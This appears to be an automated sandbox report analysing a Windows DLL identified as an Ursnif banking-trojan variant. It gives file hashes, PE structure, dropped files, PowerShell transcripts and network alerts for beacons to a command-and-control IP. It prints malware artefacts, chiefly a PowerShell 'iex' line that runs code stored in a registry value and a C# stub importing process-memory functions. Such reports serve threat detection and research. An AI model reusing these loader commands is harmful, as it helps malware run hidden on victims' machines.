                                                          SHA1:D0F5CBC44E5B7DDD673F51164A68DE0C47E7EC74
                                                          SHA-256:A6904C47757F5AC51C966E7BC9D0BC5B6EB9F09C53FC843CD3B28ACF44DA2F37
                                                          SHA-512:6E6B2A6F74845D5207AA9D57558E701B842392CB1D89B02ECAFEACAB746C22054E9A92F7AB9D7A5B8C9A7C7764CEB054F6CA17AF7DE9A6A54C8F28C0110EEB87
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6445805370692286
                                                          Encrypted:false
                                                          SSDEEP:24:etGSi/WMOWEey8MTz7X8daP0eWQyaDdWSWtJ0DtkZfgB/7XI+ycuZhNbWakSyHPE:6i/A7KMTcd6qZkWPVJgh1ulqa3+q
                                                          MD5:A4133BB77D49BF5FE87ABE8507B3EBD7
                                                          SHA1:1871D83D9E0E0850DF8F2146693135C4F7770EE5
                                                          SHA-256:365D9862EAB5F5F08A5926E86058C33BE06692E309FD3D5F53085BF7636CD97F
                                                          SHA-512:17EDADBCD3E5AE487E6652567B5A046AD4955084458B5951A9C365C9BC43E43A7EF67D5109F4E4319A98695CF30FF18046F8796F3042BC82D30605BF209FA36C
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.ddwuzigh.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1124345771696067
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTak7YnqqfPN5Dlq5J:+RI+ycuZhNRakSfPNnqX
                                                          MD5:B7D8E5C3BC81D5C419A478823788E0F7
                                                          SHA1:CCF5C55CAC587EBB0C20A4FB2D615BA1746EB793
                                                          SHA-256:570747FD73BC71FF18100C1F1F58F31127BB6497396718176BDE33882C949C36
                                                          SHA-512:5B42A169F5F8A6D9EF707BFF46CFF188027473576C4FA1E0C5E1C4D214AFAB5FD92131DA1F7CF2276985A6B514511C08241BDF300B6B763E6CAF43823CF24912
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.e.e.h.v.x.m.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.e.e.h.v.x.m.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:true
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.271207229716755
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fCN5WNDJH0zxs7+AEszIwkn23fCN5W5:p37Lvkmb6KRfJB+WZEifJrFH
                                                          MD5:6CF8D7A784B60B520B01D64CFDEC3508
                                                          SHA1:CD91CFE9EF2EDA8F6411ED9A6817FD7553709484
                                                          SHA-256:9903E082EA138385CE8CA2418FD1848F422EA4391352B5B5ED57D12C69500D7B
                                                          SHA-512:4FDD957F2C27F2E0C566066310715DD6A4F70921E8140FCDC8893931E2D72DB1E79CB96AB74714250AD0735C9502B4BE767FE3FDD82CE4A14519C56F9C690BC6
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6442225461586313
                                                          Encrypted:false
                                                          SSDEEP:24:etGSrXWMOWEey8MTz7X8daP0eWQSDdWSWtJ0DtkZf6mBqO7XI+ycuZhNRakSfPNq:6bA7KMTcd6q1WPVJ6mU81ulRa39q
                                                          MD5:DE4F576253BDA1AE82659E3E111C25E6
                                                          SHA1:8A1237FCD0B3E732089509C1AA08FD31532A7564
                                                          SHA-256:599CF9AE58AA3E33D27F5A6B179DC111FCE16A907A2BA8EFEE485E483A07DD44
                                                          SHA-512:388163ABC93D673A14C861172E2BAE47078E38114660CAC4361433B8A1E7EADE57BAFEC90753C1BE5F60FDFCE7EF7A61966AF51642DF979CF8CA4A447AAA1F8A
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.keehvxm3.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\Documents\20211007\PowerShell_transcript.910646.NcA_PxyH.20211007013229.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1189
                                                          Entropy (8bit):5.305482263812092
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAs7vBZQx2DOXUWOLCHGIYBtBCWxHjeTKKjX4CIym1ZJXyOLCHGIYBtB7nxSAO:BZqvjQoORFeVxqDYB1ZQFerZZw
                                                          MD5:59590A90D28BC6CF4C8C601B8DD050B5
                                                          SHA1:683AE8715C414BA8B4FBB180D5428437C1A0C239
                                                          SHA-256:98CB74CD1B59345C836ECAFD81BF563BE36E0931F98D07D4643D2F2A01B124EF
                                                          SHA-512:DAC46930F0F98749EF7719761FD4D9A5E6E3EDF6AD16810CF6CD90164A9F08E66E8155F4583AE80D75DAC6F2C89B30C4E3142099A28B97B8C970403D5483DF9F
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211007013230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 4588..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211007013230..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..
                                                          C:\Users\user\Documents\20211007\PowerShell_transcript.910646.uobBzu5J.20211007013230.txt
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1189
                                                          Entropy (8bit):5.308334237745025
                                                          Encrypted:false
                                                          SSDEEP:24:BxSAs7vBZQx2DOXUWOLCHGIYBtBCWWHjeTKKjX4CIym1ZJXyOLCHGIYBtBamnxS8:BZqvjQoORFeVWqDYB1ZQFeaoZZ6C
                                                          MD5:F38AD184905D39ED5F604BD58DF787FB
                                                          SHA1:DA25886901C51B476DD82D233102E94B5E61B6E2
                                                          SHA-256:CF176D0FC864490B8181A27D38241E0140ADBB22A58ACB2F4791909922E08C31
                                                          SHA-512:AB3EEB69125BAA4D4E14C89361B05C6D551F46B370919601E5C8E64D211E9FB66966664E379B90E61CA0640E738B625B03FE8B3457824ACDBC55F87A2D2F5524
                                                          Malicious:false
                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211007013230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 3740..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211007013230..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..
                                                          \Device\ConDrv
                                                          Process:C:\Windows\System32\nslookup.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):28
                                                          Entropy (8bit):4.039148671903071
                                                          Encrypted:false
                                                          SSDEEP:3:U+6QlBxAN:U+7BW
                                                          MD5:D796BA3AE0C072AA0E189083C7E8C308
                                                          SHA1:ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
                                                          SHA-256:EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
                                                          SHA-512:BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
                                                          Malicious:false
                                                          Preview: Non-authoritative answer:...

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):6.647077324309591
                                                          TrID:
                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                          • DOS Executable Generic (2002/1) 0.20%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:data.dll
                                                          File size:453131
                                                          MD5:b0165e4e73dad2ac1cb519ea1eab8bd6
                                                          SHA1:4ebb5db088d233d4c85b19b299613a240ce25c95
                                                          SHA256:7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
                                                          SHA512:0f19a2902265b9e56e8f46ffe283a2796142ab59ef42d97a957bb6327494f838d8a262b957152ad768322bca4b2c05188c386c54a5c65c77c60c3205c742ea30
                                                          SSDEEP:12288:kHlAiJHCwjXvMHk37t4Mv//IfN/YoyL8ozF0nxatQ7:kHltJHCkvH/IJvUWxata
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g...g...g....l..g..K.8..g...9...g...9...g....0..g...9...g....4..g...g...f...9...g...9..(g...9...g...9...g...9...g..Rich.g.

                                                          File Icon

                                                          Icon Hash:74f0e4ecccdce0e4

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x10007197
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x10000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x57EEB746 [Fri Sep 30 19:04:38 2016 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:3a94ffcdb86144f7d0b6d92dd3393d93

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          cmp dword ptr [ebp+0Ch], 01h
                                                          jne 00007F83D8F13BC7h
                                                          call 00007F83D8F1435Bh
                                                          push dword ptr [ebp+10h]
                                                          push dword ptr [ebp+0Ch]
                                                          push dword ptr [ebp+08h]
                                                          call 00007F83D8F13A7Ah
                                                          add esp, 0Ch
                                                          pop ebp
                                                          retn 000Ch
                                                          push ebp
                                                          mov ebp, esp
                                                          push 00000000h
                                                          call dword ptr [1004F06Ch]
                                                          push dword ptr [ebp+08h]
                                                          call dword ptr [1004F068h]
                                                          push C0000409h
                                                          call dword ptr [1004F060h]
                                                          push eax
                                                          call dword ptr [1004F070h]
                                                          pop ebp
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000324h
                                                          push 00000017h
                                                          call 00007F83D8F47B7Fh
                                                          test eax, eax
                                                          je 00007F83D8F13BC7h
                                                          push 00000002h
                                                          pop ecx
                                                          int 29h
                                                          mov dword ptr [1006CD98h], eax
                                                          mov dword ptr [1006CD94h], ecx
                                                          mov dword ptr [1006CD90h], edx
                                                          mov dword ptr [1006CD8Ch], ebx
                                                          mov dword ptr [1006CD88h], esi
                                                          mov dword ptr [1006CD84h], edi
                                                          mov word ptr [1006CDB0h], ss
                                                          mov word ptr [1006CDA4h], cs
                                                          mov word ptr [1006CD80h], ds
                                                          mov word ptr [1006CD7Ch], es
                                                          mov word ptr [1006CD78h], fs
                                                          mov word ptr [1006CD74h], gs
                                                          pushfd
                                                          pop dword ptr [1006CDA8h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [1006CD9Ch], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [1006CDA0h], eax

                                                          Rich Headers

                                                          Programming Language:
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x6ae900xb0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6af400x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x1090000x440.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x10a0000x2cbc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x691400x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x691980x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x4f0000x19c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x4d48c0x4d600False0.541116594305data6.75100933622IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rdata0x4f0000x1c8ec0x1ca00False0.58397584607data5.72385266985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x6c0000x9b7e80xe00False0.204520089286data2.89792338491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .gfids0x1080000x2280x400False0.2529296875data1.74193986935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc0x1090000x4400x600False0.292317708333data2.5339353314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x10a0000x2cbc0x2e00False0.777513586957data6.63564333671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0x1090600x3dcdataEnglishUnited States

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllTlsAlloc, LoadLibraryW, VirtualProtectEx, GetModuleHandleW, CreateSemaphoreW, GetTempPathW, WriteConsoleW, CloseHandle, CreateFileW, OutputDebugStringW, ReadConsoleW, GetEnvironmentVariableW, InitializeCriticalSection, GetModuleFileNameW, RemoveDirectoryW, DeviceIoControl, GetCurrentProcess, EnterCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, EncodePointer, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, RtlUnwind, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetCurrentThread, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, GetStdHandle, GetFileType, SetConsoleCtrlHandler, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, ReadFile, DecodePointer
                                                          ole32.dllCoUninitialize, CoTaskMemAlloc, CoInitialize, CoTaskMemFree
                                                          CRYPTUI.dllCryptUIDlgViewContext, CryptUIDlgViewCertificateW, CryptUIWizDigitalSign, CryptUIWizFreeDigitalSignContext, CryptUIWizImport, CryptUIWizExport, CryptUIDlgSelectCertificateFromStore

                                                          Exports

                                                          NameOrdinalAddress
                                                          Bonebegin10x1003f370
                                                          Father20x1003f4d0
                                                          Ratherdesign30x1003f680
                                                          Scorematch40x1003f6f0
                                                          Silverwere50x1003f6d0
                                                          StoneNumeral60x1003f7e0

                                                          Version Infos

                                                          DescriptionData
                                                          LegalCopyright Fig Governhear suggest Corporation. All rights reserved
                                                          InternalNameRopemother Smellclean
                                                          FileVersion5.6.0.165
                                                          CompanyNameFig Governhear suggest Corporation Alsoheld
                                                          ProductNameFig Governhear suggest Shoecould Quietfrom
                                                          ProductVersion5.6.0.165
                                                          FileDescriptionFig Governhear suggest Shoecould Quietfrom
                                                          OriginalFilenameSoon.dll
                                                          Translation0x0409 0x04b0

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          10/07/21-01:32:18.233038TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977680192.168.2.4194.147.86.221
                                                          10/07/21-01:32:19.242466TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977780192.168.2.4194.147.86.221
                                                          10/07/21-01:32:19.340180TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977880192.168.2.4194.147.86.221
                                                          10/07/21-01:32:19.340180TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977880192.168.2.4194.147.86.221
                                                          10/07/21-01:32:20.827048TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977980192.168.2.4194.147.86.221
                                                          10/07/21-01:32:20.827048TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977980192.168.2.4194.147.86.221
                                                          10/07/21-01:32:20.886424TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978080192.168.2.4194.147.86.221
                                                          10/07/21-01:32:20.886424TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978080192.168.2.4194.147.86.221
                                                          10/07/21-01:32:23.671129TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978180192.168.2.4194.147.86.221
                                                          10/07/21-01:32:23.671129TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4978180192.168.2.4194.147.86.221
                                                          10/07/21-01:34:00.834180TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4986280192.168.2.4194.147.86.221
                                                          10/07/21-01:34:00.834180TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4986280192.168.2.4194.147.86.221

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 7, 2021 01:32:18.183357000 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.232420921 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.232556105 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.233037949 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.322987080 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712804079 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712869883 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712912083 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712929010 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.712949038 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.712989092 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713000059 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.713027000 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713063002 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713072062 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.713100910 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713139057 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713155031 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.713187933 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.713233948 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.762798071 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.762856007 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.762897968 CEST8049776194.147.86.221192.168.2.4
